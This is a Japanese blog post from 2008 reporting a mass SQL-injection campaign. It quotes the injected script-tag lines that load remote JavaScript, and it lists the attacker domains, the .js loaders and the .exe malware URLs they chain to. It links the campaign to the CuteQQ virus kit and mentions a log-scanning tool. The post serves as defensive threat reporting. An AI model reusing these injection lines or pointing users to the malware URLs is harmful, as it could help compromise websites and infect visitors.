忍者ブログ

ハルファ紀行

インジェクション

JPCERT/CC追記されていましたが、さらに更新されているのでとりあえず。
*** 更新: 2008年04月08日追記 *******************************
<script src=http://<任意のホスト>/fjp.js></script>
<script src=http://<任意のホスト>/1.js></script>
注) 上記以外のファイル名の Javascript が使用される可能性もあります。
************************************************************

414151.com 2008-04-01
http://www.414151.com/fjp.js
-(略)→http://www.414151.com/xp.exe
nmidahena.com 2008-04-01
http://www.nmidahena.com/1.js
-(略)→http://www.nmidahena.com/test.exe

10日後…。
aspder.com 2008-04-11
http://www.aspder.com/1.js
-(略)→http://www.worldofwarcraftn.com/xp.exe
nihaorr1.com 2008-04-11
http://www.nihaorr1.com/1.js
-(略)→http://www.nihaorr1.com/test.exe

いずれもCuteQQで作成、SQLインジェクションで注入された物と思われます。
検体は各社に提出済みです。

IPAではWebのアクセスログからSQLインジェクションを抽出するツールiLogScannerをリリースしています。

頭に「i」を付ければいいやという(10年前のiMacみたいな)センスなんとかなりませんかね。
おまけに残りが「LogScanner」ではOSなのかWebなのかSQLなのかわかりません。

メモ:CuteQQ http://www.cuteqq.cn/
暗黒工作組(C.S.T. CuteQQ Soft Team)のウイルス作成ツール暗黒網馬者(画像)。
Ajax、Bfyy、QVod、Pps、XunLeiといったファイル名でおなじみ。
以前に書いた2117966なども含め、広く使われている。

http://www.worldofwarcraftn.com/xp.exe

http://www.nihaorr1.com/test.exe
PR

コメント

カレンダー

06 2025/07 08
S M T W T F S
1 2 3 4 5
6 7 8 10 11 12
13 14 15 17 19
20 21 22 23 24 25 26
27 28 29 30 31

フリーエリア

最新コメント

[09/14 ヨシノ]
[10/19 Dolly]
[08/22 まとめ臨時。]

最新記事

PDF
(07/18)
(07/16)
PDF
(07/09)
(06/10)
PDF
(06/03)

最新トラックバック

プロフィール

HN:
Ilion
性別:
非公開

バーコード

ブログ内検索